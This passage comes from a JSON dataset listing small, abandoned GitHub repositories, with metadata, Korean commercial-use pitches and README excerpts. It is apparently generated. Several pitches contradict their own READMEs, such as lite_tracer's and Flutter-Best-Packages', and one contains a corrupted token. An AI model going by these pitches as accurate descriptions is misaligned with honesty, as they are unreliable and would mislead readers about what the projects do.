github'a kayıt olduktan sonra kullanıcı adılarını Mikro Destek Whatsapp grubunda kullanıcı adlarını belirterek geliştirici olabilirler.\n\nBu projede geliştirici olmadan yapacağınız değişiklikler burayı etkilemeyecektir. Kendi hesabınız üzerinde çatal(Form) oluşturur. Bu sebeple önce bu projede geliştirici olmanız gerekmektedir.  \n\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"sevenshal/oksharedprefs","github_url":"https://github.com/sevenshal/oksharedprefs","stars":5,"language":"Java","license":"unknown","abandonment_months":101,"description":"# oksharedprefs 프로젝트 분석\n\n## 왜 보물인가\n휴대폰 앱에서 자주 사용하는 작은 정보(로그인 기록, 설정값 등)를 쉽게 저장하고 불러올 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **모바일 앱 개발 서비스**: 앱 개발자들을 위해 이 도구를 SaaS 형태로 제공하여 월 구독료 받기\n- **앱 개발 교육 플랫폼**: 초보 앱 개발자들","readme_excerpt":"# oksharedpref\n\n```\n通过注解生成SharedPreferences实现的工具。解决安卓SharedPreferences多进程数据访问不一致的问题。\n```\n\n## 简介\n1. 让你告别手写包装代码管理SharedPreferences，通过注解的方式定义SharedPreferences包装类，使你可以方便的通过get/set方法操作SharedPreferences。\n2. 现在看来，安卓官方基本放弃了解决SharedPreferences跨进程访问不一致这一问题了，跨进程访问数据官方更加推荐ContentProvider。\n3. OkSharedPrefs将SharedPreferences和ContentProvider结合起来，让你使用SharedPreferences更加方便，并且通过ContentProvider交换数据，解决了跨进程数据访问不一致的问题。\n4. 底层仍然使用系统SharedPreferences实现，所以你的应用之前没有使用oksharedprefs，你可以很方便的移植，在新版本中加入这个库，已安装用户的原有数据不会有任何影响。\n\n## 安装\n\n```groovy\nallprojects {\n\t\trepositories {\n\t\t\tmaven { url 'https://jitpack.io' }\n\t\t}\n\t}\n\ndependencies {\n    compile 'com.github.sevenshal.oksharedprefs:api:1.0.1'\n    annotationProcessor 'com.github.sevenshal.oksharedprefs:processor:1.0.1'\n}\n```\n\n## 用法\n\n定一个interface类并且如下所示添加注解：\n\n```java\n\n@SharedPreference(value = \"Msg\", implSharedPreference = false, preferenceName = \"msg\", multiProcess = false)\npublic interface IMsg {\n\n    @DefaultValue(value = \"null\", createDefaultGetter = false)\n    String","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"BorealisAI/lite_tracer","github_url":"https://github.com/BorealisAI/lite_tracer","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":69,"description":"# BorealisAI/lite_tracer 분석\n\n## 왜 보물인가\n프로그램 실행을 자세히 추적하고 기록하는 경량 도구로, 소프트웨어 개발자들이 버그를 찾거나 성능을 분석할 때 필수적인 역할을 합니다.\n\n## 어디에 �flesh 수 있나\n- **SaaS 서비스**: 클라우드 기반 코드 분석 플랫폼으로 개발자들에게 추적 기능을 웹 인터페이스로 제공\n- **","readme_excerpt":"![lite_tracer Logo](https://github.com/BorealisAI/lite_tracer/blob/master/logos/Litetracer-Logo-Full-LB.png)\n\n--------------------------------------------------------------------------------\n\n# LiteTracer: a light weight experiment reproducibility toolset\n\nLiteTracer acts as a drop-in replacement for argparse, and it can generate unique identifiers for experiments in addition to what argparse already does.\nAlong with a reverse lookup tool, LiteTracer can trace-back the state of a project that generated any result tagged by the identifier.\nThe identifiers are unique based on the combination of four factors:\n1) code version;\n2) un-committed code changes\n3) untracked files in the project;\n3) any command line arguments supplied at runtime.\n\nAs the name suggests, LiteTracer is designed to be as lightweight as possible. It is a minimalistic toolset and convention to enable reproducible experimental research, rather than a framework that one has to learn about. \n\n## To track:\n\n1) Instead of u","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"OnebugIS/cart-search","github_url":"https://github.com/OnebugIS/cart-search","stars":13,"language":"HTML","license":"unknown","abandonment_months":103,"description":"# cart-search 저장소 분석\n\n## 왜 보물인가\n온라인 쇼핑몰에서 고객이 찾는 상품을 빠르고 정확하게 검색할 수 있도록 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 쇼핑몰을 위한 구독형 검색 엔진 제공 서비스\n2. **내부 업무 도구**: 대형 이커머스 기업의 상품 검색 및 추천 시스템 구축\n3. **API ","readme_excerpt":"# cart-search\nhttps://github.com/OnebugIS/React-https-m.maizuo.com-v4-新增模拟cart/search\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"OnebugIS/React-pc","github_url":"https://github.com/OnebugIS/React-pc","stars":13,"language":"","license":"unknown","abandonment_months":103,"description":"# React-pc 저장소 분석\n\n## 왜 보물인가\n웹사이트를 컴퓨터 프로그램처럼 만들 수 있는 기술 기반으로, 기업 업무 시스템이나 관리 도구를 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 회사 직원들이 사용하는 판매 현황, 재고 관리, 직원 정보 시스템\n- **SaaS 서비스**: 구독료를 받고 제공하는 온라인 프","readme_excerpt":"# React-pc","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"aparrish/word-gan-book-generator","github_url":"https://github.com/aparrish/word-gan-book-generator","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":79,"description":"# Word GAN Book Generator 분석\n\n## 왜 보물인가\n인공지능이 자동으로 새로운 책의 내용을 만들어주는 기술로, 출판사나 콘텐츠 제작자들이 창작 과정을 혁신할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 작가들이 웹사이트에서 책 초안을 자동 생성하고 편집하는 구독형 플랫폼\n2. **내부 업무 도구**: 출판사의 ","readme_excerpt":"# Generating books from GANs trained on bitmaps of words\n\nBy [Allison Parrish](http://www.decontextualize.com/)\n\nFor [NaNoGenMo 2019](http://nanogenmo.github.io), I trained a suite of GANs on\nbitmaps of English words and then generated a book using samples from the\nlatent space of those GANs.\n\nDownload a [full\nnovel](http://static.decontextualize.com/ahe-thd-yearidy-ti-isa.pdf) (~100MB\nPDF) resulting from this process, entitled (based on optical character\nrecognition of the title page) *Ahe Thd Yearidy Ti Isa*. You can also [browse\nan online gallery of the\nbook](http://static.decontextualize.com/ahe-thd-yearidy-ti-isa-gallery/).\n\n![Novel example](novel-example.jpg)\n\nEach of the words in the novel was generated from a normally-distributed random\nvector. I produced a second book where each word was generated from steps along\ninterpolations between many pairs of randomly-selected points in the latent\nspace. That [book of\ninterpolations](http://static.decontextualize.com/interpolations.pdf","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"JaniceZhao/Douban-Dushu-Dataset","github_url":"https://github.com/JaniceZhao/Douban-Dushu-Dataset","stars":5,"language":"","license":"unknown","abandonment_months":91,"description":"# Douban-Dushu-Dataset 평가\n\n## 왜 보물인가\n중국 최대 도서 평가 플랫폼인 더우반의 수백만 권 책 정보와 사용자 평가 데이터를 한 곳에 모아놓았기 때문입니다.\n\n## 어디에 쓸 수 있나\n\n1. **도서 추천 웹사이트 SaaS**: 사용자의 독서 취향을 분석해 맞춤형 책을 추천하는 구독형 서비스\n2. **출판사 내부 도구**: 경쟁사 신","readme_excerpt":"# Dateset Description\n\nDouBan DuShu is a Chinese website where users can share their reviews about various kinds of books.  Most of the users in this website are unprofessional book reviewers. Therefore, the comments are usually spoken Chinese or even Internet slang.\n\nIn addition to the comments, users can mark the books from one star to 5 stars according to the quality of the books. We have collected more than 37 million short comments from about 18 thousand books with 1 million users. The great number of users provide diversity of the language styles, from moderate formal to informal. An example of the data item is shown in the following table.\n\n\n| Key       \t| Description                                      \t| Value Example    \t|\n|-----------\t|--------------------------------------------------\t|------------------\t|\n| Book Name \t| The name of the book                             \t| 理想国           \t|\n| User Name \t| Who gives the comment                            \t| 399              \t","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"iampawan/Flutter-Best-Packages","github_url":"https://github.com/iampawan/Flutter-Best-Packages","stars":5,"language":"Dart","license":"unknown","abandonment_months":75,"description":"# Flutter-Best-Packages 분석\n\n## 왜 보물인가\n스마트폰 앱 개발을 더 쉽게 해주는 유용한 도구 모음집이 담긴 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 SaaS**: 앱 개발자를 위한 온라인 강좌나 개발 템플릿 판매 플랫폼\n2. **스타트업 내부 도구**: 신생 IT회사의 앱 개발팀이 빠른 프로토타입 제작 시간 ","readme_excerpt":"# flutter_best_packages\n\nA new Flutter project.\n\n## Getting Started\n\nThis project is a starting point for a Flutter application.\n\nA few resources to get you started if this is your first Flutter project:\n\n- [Lab: Write your first Flutter app](https://flutter.dev/docs/get-started/codelab)\n- [Cookbook: Useful Flutter samples](https://flutter.dev/docs/cookbook)\n\nFor help getting started with Flutter, view our\n[online documentation](https://flutter.dev/docs), which offers tutorials,\nsamples, guidance on mobile development, and a full API reference.\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"awest1339/paywalled","github_url":"https://github.com/awest1339/paywalled","stars":9,"language":"Python","license":"unknown","abandonment_months":119,"description":"# awest1339/paywalled 분석 보고서\n\n## 왜 보물인가\n온라인 콘텐츠에 유료 결제 기능을 간단하게 추가할 수 있는 도구로, 블로그나 뉴스 사이트 운영자들이 독자에게 돈을 받을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 구독 서비스**: 신문사가 기사 일부를 유료로 제한하고 월간 구독료를 받는 시스템\n2. **온라인 강의 플","readme_excerpt":"","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/wp-recent-tweet","github_url":"https://github.com/fossasia/wp-recent-tweet","stars":11,"language":"PHP","license":"unknown","abandonment_months":119,"description":"# fossasia/wp-recent-tweet 분석 보고서\n\n## 왜 보물인가\nWordPress 블로그에 최신 트위터 글을 자동으로 표시해주는 도구로, 소셜 미디어와 블로그를 연동하려는 사람들의 수작업을 없애줍니다.\n\n## 어디에 쓸 수 있나\n1. **블로그 플러그인 판매**: WordPress 사용자들이 월 5~10달러 구독료를 내고 자동 연동 기능을 ","readme_excerpt":"=== Recent Tweets Widget ===\n\nContributors: noahkagan\nTags: recent tweets, twitter widget, twitter api v1.1, cache, twitter, tweets, social media\nRequires at least: 3.4.1\nTested up to: 4.5\nStable tag: 1.6.5\nLicense: GPLv2 or later\nLicense URI: http://www.gnu.org/licenses/gpl-2.0.html\n\nRecent Tweets Widget plugin for new Twitter API v1.1 with CACHE, so you won't be rate limited at Twitter!\n\n== Description ==\n\nRecent Tweets Widget plugin for Twitter API v1.1 with Cache. It uses the new Twitter API v1.1 and stores tweets in the cache. It means that it will read status messages from your database and it doesn't query Twitter.com for every page load so you won't be rate limited. You can set how often you want to update the cache.\n\n\n== Installation ==\n\n1. Unzip the downloaded zip file.\n2. Upload the `recent-tweets` folder and its contents into the `wp-content/plugins/` directory of your WordPress installation\n3. Activate Recent Tweets Widget from Plugins page.\n4. Go to your Widgets menu, add","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"secretbatcave/Uk-Bird-Classifier","github_url":"https://github.com/secretbatcave/Uk-Bird-Classifier","stars":5,"language":"Python","license":"unknown","abandonment_months":107,"description":"# UK Bird Classifier 평가 보고서\n\n## 왜 보물인가\n새의 사진을 찍으면 자동으로 어떤 새인지 알려주는 기술로, 새 관찰 애호가들과 생태 연구자들이 매우 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **생조류 관찰 앱 서비스**: 취미 새 관찰자들을 위한 구독형 모바일 앱으로 월정액 수익 창출\n2. **박물관·수족관 내부 도구","readme_excerpt":"# UK bird classifier\n\nThis is a pre-trained inception v3 tensorflow model that should be able to correctly classify common UK\nbirds. \n\n# What can it detect:\n\nGood question, there are two models currently, (look in the models folder.) `largeBirds4.pb` is trained on many many more species of birds, with a slight drop in accuracy, where as `ukGarenModel.pb` is trained on only 12. \n\nThe data I've trained this model on is fairly specific. All animals were closely cropped, this means that to get good results you'll need to make sure that your image you wish to classify is side on and quite big.\n\nThe list of animals that `ukGardenBirds.pb` has been trained on are:\n\n1. Gray Squirrels\n2. Crow (carrion and rook)\n3. Wren\n4. Wood pidgeon\n5. House sparrow\n6. Magpie\n7. Blackbird (male and female, although female is less well defined in the model)\n8. Chaffinch\n9. Dunnock\n10. Song Thrush\n11. Robin (male and female) \n12. Cats\n\nLargeBirds4 however has many more species it can detect:\n\n1.  pheasant\n1.  g","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"medienbaecker/kirby-simplemde","github_url":"https://github.com/medienbaecker/kirby-simplemde","stars":14,"language":"JavaScript","license":"unknown","abandonment_months":73,"description":"# kirby-simplemde 상용화 분석\n\n## 왜 보물인가\n웹사이트 운영자들이 복잡한 기술 없이 쉽게 글을 작성하고 편집할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **블로그/뉴스레터 플랫폼 SaaS**: 개인 블로거와 소규모 미디어사에게 글쓰기 기능을 제공하는 구독 서비스\n2. **중소 기업 웹사이트 관리 도구**: 직원이 회사 홈페이","readme_excerpt":"This plugin for Kirby 2 is no longer maintained.\n\n# SimpleMDE for Kirby\n\nThis is a textarea with Markdown highlighting using [SimpleMDE](https://github.com/sparksuite/simplemde-markdown-editor).\n\n![Preview](https://user-images.githubusercontent.com/7975568/33235164-07cf8c6c-d233-11e7-979e-58981a306b7b.gif)\n\n## Installation\n\nPut the `kirby-simplemde-master` folder into your `site/plugins` folder and rename it to `simplemde`.\n\nYou can then replace your `textarea` fields with `simplemde` like that:\n\n\n```\ntext:\n  label: Text\n  type:  simplemde\n```\n\n## Features\n\nCompared to the built-in textarea, this field has some advantages:\n\n- Live Markdown highlighting. Including green Kirbytags.\n- Undo/redo via `Ctrl`/`⌘` + `Z`/`Y`.\n- No modals for URLs and email addresses as this prevents the buttons from showing in structure fields.\n- Automatic link/email detection when selecting text and using the `link` or `email` button.\n- Easy to add custom buttons\n- Sticky toolbar on the top for better reachabi","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/x-mario","github_url":"https://github.com/fossasia/x-mario","stars":11,"language":"Shell","license":"unknown","abandonment_months":151,"description":"# x-mario 저장소 분석\n\n## 왜 보물인가\n마리오 게임처럼 플레이할 수 있는 오픈소스 프로젝트로, 게임 개발이나 교육용으로 활용할 수 있는 기초 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 학습 플랫폼 SaaS**: 초보자가 게임 만드는 법을 배우는 온라인 강좌에 포함된 실습 교재로 제공\n2. **교육용 내부 도구**: 프로그래밍 학원이나 ","readme_excerpt":"","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"takefumi-yoshii/react-hooks-ogiri","github_url":"https://github.com/takefumi-yoshii/react-hooks-ogiri","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":41,"description":"# react-hooks-ogiri 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 사용자가 클릭하거나 입력할 때의 상호작용을 간단하게 만들어주는 개발자용 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 협업 도구나 프로젝트 관리 앱에서 사용자 입력 처리 기능을 빠르게 구축할 때\n2. **내부 업무 도구**: 기업의 사내 시스템에서 직원","readme_excerpt":"|<img src=\"./logo.png\" width=\"50%\">|\n|:-:|\n|🎄 Advent calendar of 2018.This is a showreel using a React Hooks API.|\n\n|SUN|MON|TUE|WED|THU|FRI|SAT|\n|:-:|:-:|:-:|:-:|:-:|:-:|:-:|\n|-|12/03|12/04|12/05|12/06|12/07|12/08|\n|-|[![1203.jpg](img/1203.jpg)](https://github.com/takefumi-yoshii/react-hooks-ogiri/tree/master/apps/ripple-button)|[![1204.jpg](img/1204.jpg)](https://github.com/takefumi-yoshii/react-hooks-ogiri/tree/master/apps/toggle-switch)|[![1205.jpg](img/1205.jpg)](https://github.com/takefumi-yoshii/react-hooks-ogiri/tree/master/apps/photo-carousel)|[![1206.jpg](img/1206.jpg)](https://github.com/takefumi-yoshii/react-hooks-ogiri/tree/master/apps/drawer-menu)|[![1207.jpg](img/1207.jpg)](https://github.com/takefumi-yoshii/react-hooks-ogiri/tree/master/apps/pallalax-section)|[![1208.jpg](img/1208.jpg)](https://github.com/takefumi-yoshii/react-hooks-ogiri/tree/master/apps/pallalax-hero)|\n|12/09|12/10|12/11|12/12|12/13|12/14|12/15|\n|[![1209.jpg](img/1209.jpg)](https://github.com/takefumi","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"yacy/YaCyIndexerGreasemonkey","github_url":"https://github.com/yacy/YaCyIndexerGreasemonkey","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":161,"description":"# YaCy Indexer Greasemonkey 분석\n\n## 왜 보물인가\n인터넷 검색 엔진이 수집하지 못하는 웹 페이지들을 자동으로 찾아 정리해주는 도구로, 검색 정보의 민주화를 실현하는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 웹 모니터링 플랫폼 - 경쟁사 웹사이트 변화를 자동으로 추적하고 알려주는 구독 서비스\n","readme_excerpt":"YaCyIndexerGreasemonkey\n=======================\n\nThis is a Greasemonkey script to index visited websites with the [YaCy P2P search engine](http://yacy.net/).  It has the advantage over YaCy's proxy server that it can index pages with cookies, and (in many case) pages with query strings, without leaking private data.  It can also crawl visited pages with a depth other than 0 (something YaCy's proxy does not support).\n\nInstallation (Basic)\n--------------------\n\nFirst off, if you haven't installed [YaCy](http://yacy.net/en/index.html), you should do that first.\n\nYou should also install Greasemonkey in Firefox, or a compatible add-on depending on your browser.\n\nFinally, just view the yacy_indexer.user.js file in GitHub and click the \"Raw\" link.  Greasemonkey should prompt you to install the script.\n\nIf you want to use the default settings (crawl depth 1), you're done!  Otherwise, see the next section.\n\nInstallation (Custom Settings)\n------------------------------\n\nIf you'd like to customiz","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia11-drupal","github_url":"https://github.com/fossasia/fossasia11-drupal","stars":11,"language":"PHP","license":"gpl-2.0","abandonment_months":152,"description":"# fossasia11-drupal 저장소 분석\n\n## 왜 보물인가\nFOSSASIA 커뮤니티의 공식 행사 웹사이트를 운영하던 오픈소스 프로젝트로, 대규모 기술 행사의 웹사이트 구축 경험과 노하우가 담긴 자산입니다.\n\n## 어디에 쓸 수 있나\n- **행사 관리 SaaS**: 컨퍼런스, 해커톤, 세미나 등 각종 행사의 등록·일정 관리 웹사이트를 제공하는 온라인","readme_excerpt":"fossasia11-drupal\n=================\n\nFOSSASIA 2011 Drupal Site\n","composite_score":0.3003,"license_safety_tag":"restricted"},{"name":"w568w/How_To_Report_Bug_Properly","github_url":"https://github.com/w568w/How_To_Report_Bug_Properly","stars":7,"language":"","license":"unknown","abandonment_months":107,"description":"# How_To_Report_Bug_Properly 분석\n\n## 왜 보물인가\n소프트웨어 회사들이 사용자로부터 받는 수천 개의 버그 신고 중에서 실제로 해결할 수 있는 것만 골라내는 방법을 알려주는 실용 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 지원팀이 버그 신고를 체계적으로 분류하고 개발팀에 전달하는 프로세스 구축\n2. ","readme_excerpt":">没有难以解决的Bug，只有难以解决的Bug报告。  \n\n**如果您不想看完整版，可以[点我](#小结)去看超级精简版。**  \n我希望您花时间看完，这对您所使用的程序修复bug有很大帮助。  \n# 正文\n当你报告Bug前，你需要注意以下几点:\n## “程序不好用”\n程序员不是弱智：如果程序**一点都不好用**，他们**不可能不知道**。  \n他们不知道一定是因为程序在他们看来工作得很正常。  \n所以，或者是您作过一些与他们不同的操作，或者是您的系统环境与他们不同。  \n**他们需要信息**，报告bug也是为了提供信息。信息总是越多越好。\n## “演示给我看”\n报告bug的最好的方法之一是**“演示”给程序员看**。让程序员站在电脑前，运行他们的程序，指出程序的错误。让他们看着您启动电脑、运行程序、如何进行操作以及程序对您的输入有何反应。\n\n他们对自己写的软件**了如指掌**，他们知道哪些地方不会出问题，而哪些地方最可能出问题。他们本能地知道应该注意什么。在程序真的出错之前，他们可能已经注意到某些地方不对劲，这些都会给他们一些线索。他们会观察程序测试中的每一个细节，并且选出他们认为有用的信息。\n\n这些可能还不够。也许他们觉得还需要更多的信息，会请您重复刚才的操作。他们可能在这期间需要与您交流一下，以便在他们需要的时候让bug重新出现。他们可能会改变一些操作，看看这个错误的产生是个别问题还是相关的一类问题。如果您不走运，他们可能需要坐下来，拿出一堆开发工具，花上几个小时来好好地研究一下。但是最重要的是在程序出错的时候让程序员在电脑旁。一旦他们看到了问题，他们通常会找到原因并开始试着修改。\n\n## “告诉我该怎么做”\n如今是网络时代，是信息交流的时代。我可以点一下鼠标把自己的程序送到外国的某个朋友那里，当然他也可以用同样简单的方法给我一些建议。但是如果我的程序出了什么问题，我不可能在他旁边。“演示”是很好的办法，但是常常做不到。\n\n如果您必须报告bug，而此时程序员又不在您身边，那么您就要想办法让bug重现在他们面前。当他们亲眼看到错误时，就能够进行处理了。\n\n确切地告诉程序员您做了些什么。如果是一个图形界面程序，告诉他们您按了哪个按钮，依照什么顺序按的。如果是一个命令行程序，精确的告诉他们您键入了什么命令。您应该尽可能详细地提供您所键入的命令和程序的反应。\n\n把您能想","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia10-drupal","github_url":"https://github.com/fossasia/fossasia10-drupal","stars":11,"language":"PHP","license":"NOASSERTION","abandonment_months":152,"description":"# FOSSASIA10 Drupal 저장소 분석\n\n## 왜 보물인가\n10년 전 국제 오픈소스 컨퍼런스의 공식 웹사이트 운영 시스템으로, 대규모 행사 관리 경험과 검증된 구조를 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **행사 관리 SaaS**: 컨퍼런스·세미나·전시회 등 대규모 행사의 웹사이트와 참가자 관리를 일괄 처리하는 클라우드 서비스\n2. **","readme_excerpt":"fossasia10-drupal\n=================\n\nFOSSASIA 2010 Drupal Site\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"recruit-tech/speed-hackathon-jsconf.jp","github_url":"https://github.com/recruit-tech/speed-hackathon-jsconf.jp","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# recruit-tech/speed-hackathon-jsconf.jp 분석\n\n## 왜 보물인가\nJSConf Japan 해커톤 행사의 노하우와 참가자 매칭 시스템을 담고 있어, 개발자 커뮤니티 행사를 빠르게 운영할 수 있는 템플릿으로 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대학교·기업의 해커톤/기술 행사 관리 플랫폼으","readme_excerpt":"## About\n\n- jsconf.jp 二日目 スピードハッカソン (Recruit Technologies スポンサーセッション）\n\nJSConf JP 内のスポンサートークで http://web.dev にも掲載された[スピードハッカソン](https://web.dev/five-ways-airshift-improved-their-react-app/#5.-performance-hackathons)をやります。\n実際にあるサイト（ここでは http://jsconf.jp のサイト）を高速化します。\n\n\n## 開発を始める\n\n### 必要なもの\n\n- Github のアカウント\n- git\n- node\n- Chrome\n\n### まずはサーバーを起動してみよう\n\n- 以下のコマンドを実行\n\n```\n$ git clone https://github.com/recruit-tech/speed-hackathon-jsconf.jp.git\n$ cd speed-hackathon-jsconf.jp\n$ npm i\n$ npm start\n```\n\n`npm start` すると サーバーを起動されます．\nサーバーが起動されたら，chrome で http://localhost:3000/2019/speakers にアクセスしよう\n\n#### :sparkles: Tips\n\n`npm start` すると，対応している場合ブラウザが自動で開きます\n\n### Lighthouse で スコアを計測してみよう\n\n#### 1. Chrome の 開発者ツールを立ち上げる\n\n![launch dev tools](./.github/1.png)\n\n#### 2. タブから Audits を選択\n\n![select lighthouce](./.github/2.png)\n\n#### 3. lighthouce を実行\n\n- 1. Device から `Desktop` を選択\n- 1. 青いボタンの `Run audits` をクリックする\n\n![run audits](./.github/3.png)\n\n#### 4. 100点 を目指そう！\n\n![results](./.github/4.png)\n\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"rainlst/neuron-fiber","github_url":"https://github.com/rainlst/neuron-fiber","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":38,"description":"# neuron-fiber 저장소 분석\n\n## 왜 보물인가\n신경망 기술을 활용해 복잡한 데이터 패턴을 자동으로 학습하고 예측할 수 있는 기술로, 의료·금융·제조업의 의사결정을 획기적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 의료기관용 질병 조기진단 AI 플랫폼으로 월간 구독 판매\n2. **내부 업무 도구**: 은행의","readme_excerpt":"# A high level util of neural net in javascript\n\n\n[![NPM version][npm-image]][npm-url]\n[![build status][travis-image]][travis-url]\n\n## Getting Started\n\nFollow these steps:\n\n1. [Install](#install)\n2. [Usage](#usage)\n3. [API](#API)\n4. [Algorithm](#algorithm)\n5. **[Review Example Code](https://github.com/rainlst/neuron-fiber/tree/master/examples)**\n\n## Install\n\n```\n$ npm install neuron-fiber --save\n```\n\n## Usage\n\n### Nodejs environment\n\n```js\n\nimport { NeuronNet, NeuronLayer } from 'neuron-fiber'\n\n```\n\n### Browser environment\n```js\n\nimport { NeuronNet, NeuronLayer } from 'neuron-fiber/dest/browser/index.esm.js'\n\n```\n\n```js\n\n\nconst number0 = '*****' \n              + '*   *'\n              + '*   *'\n              + '*****' \n\n/**\n *  Imagine looks like number: 1\n */\nconst number1 = '*    ' \n              + '*    '\n              + '*    '\n              + '*    '\n\n/**\n *  Imagine looks like number: 2\n */\nconst number2 = '*****' \n              + '  ** '\n              + ' **  '\n              + '*","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia-webfeeds","github_url":"https://github.com/fossasia/fossasia-webfeeds","stars":11,"language":"JavaScript","license":"mit","abandonment_months":126,"description":"# fossasia/fossasia-webfeeds 분석\n\n## 왜 보물인가\n여러 웹사이트의 뉴스를 한 곳에서 모아볼 수 있는 피드 수집 도구로, 정보 수집이 필요한 모든 조직에게 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 큐레이션 SaaS**: 개인이나 팀이 관심 분야의 뉴스를 자동으로 모아보는 구독 서비스\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# FOSSASIA Webfeeds\n\nThis is a feeder of the official FOSSASIA blog for static websites.  \n\nThe `index.html` file has a designed version that can be used as a standalone site. The `embed.html` version is designed to be embedded into websites. For example, one can make an iframe and display it on his or her site.  ","composite_score":0.3003,"license_safety_tag":"safe"},{"name":"loklak/loklak_bluemix_ant_buildpack","github_url":"https://github.com/loklak/loklak_bluemix_ant_buildpack","stars":12,"language":"Shell","license":"unknown","abandonment_months":122,"description":"# loklak/loklak_bluemix_ant_buildpack 평가\n\n## 왜 보물인가\n소셜 미디어 데이터를 자동으로 수집하고 정리해주는 기술로, 마케팅이나 연구 목적으로 SNS 정보를 대량으로 분석하려는 기업들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SNS 모니터링 서비스**: 기업이 자사 브랜드에 대한 온라인 언급을 자동으로 추적하","readme_excerpt":"Bluemix buildpack for Loklak: Java (with Apache Ant)\n===================================================\n\nThis is an external[bluemix buildpack](https://console.ng.bluemix.net/docs/cfapps/byob.html) made specifically for the [Loklak server](https://github.com/loklak/loklak_server). Forked from https://github.com/aneeshd16/heroku-buildpack-ant-loklak (Thanks!)\nIt uses Apache Ant 1.9.3 to build your application and OpenJDK 1.8.0_51 (currently) to run it.\n\nThis buildpack is being used for the direct one button deployment of loklak to IBM Bluemix\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"Kreijstal/Random-HTML-stuff","github_url":"https://github.com/Kreijstal/Random-HTML-stuff","stars":11,"language":"HTML","license":"unknown","abandonment_months":55,"description":"# Kreijstal/Random-HTML-stuff 평가\n\n## 왜 보물인가\n웹사이트 만드는 데 필요한 다양한 예제와 틀을 한곳에 모아놓은 수집품으로, 초보자가 웹디자인을 빠르게 배울 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n- **웹 디자인 학습 플랫폼**: 비전공자 대상 온라인 강좌에서 실습용 예제 자료로 제공\n- **웹사이트 빌더 도구*","readme_excerpt":"Random-HTML-stuff\n=================\n\n[![Build Status](https://travis-ci.org/Kreijstal/Random-HTML-stuff.svg?branch=master)](https://travis-ci.org/Kreijstal/Random-HTML-stuff)\nRandom experiments in HTML\n\nI decided to put this as github pages because I already did some cool stuff here so why not keep going on?\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"OnebugIS/React-https-m.maizuo.com-v4-","github_url":"https://github.com/OnebugIS/React-https-m.maizuo.com-v4-","stars":7,"language":"HTML","license":"unknown","abandonment_months":103,"description":"# OnebugIS/React-https-m.maizuo.com-v4- 분석\n\n## 왜 보물인가\n영화 예매 웹사이트를 빠르게 구축할 수 있는 완성된 React 기반 템플릿으로, 비슷한 서비스를 만들고 싶은 개발자들에게 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **영화 예매 SaaS**: 지역 영화관이나 소규모 영화사들을 위한 월 구독형 예매 ","readme_excerpt":"# React-https-m.maizuo.com-v4-\n用React构造的https://m.maizuo.com/v4/卖座电影网\n","composite_score":0.3003,"license_safety_tag":"unknown"},{"name":"paulzi/ipcamera-telegram-bot","github_url":"https://github.com/paulzi/ipcamera-telegram-bot","stars":8,"language":"PHP","license":"unknown","abandonment_months":65,"description":"# paulzi/ipcamera-telegram-bot 분석\n\n## 왜 보물인가\n집에 설치한 CCTV 카메라의 영상을 휴대폰의 텔레그램 앱으로 바로 받아볼 수 있는 자동화 시스템으로, 별도의 복잡한 앱 설치 없이 메신저로 보안 감시를 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 중소 보안 업체의 SaaS 서비스**: 고객 집/상점에 설치된 기존 C","readme_excerpt":"# IPCamera Telegram Bot\n\n## Install\n\n1) Install OS dependencies:\n \n```bash\nsudo apt-get install avconv arp-scan php-imagick\n```\n\n2) Register bot via @BotFather (send SSL-certificate to BotFather if 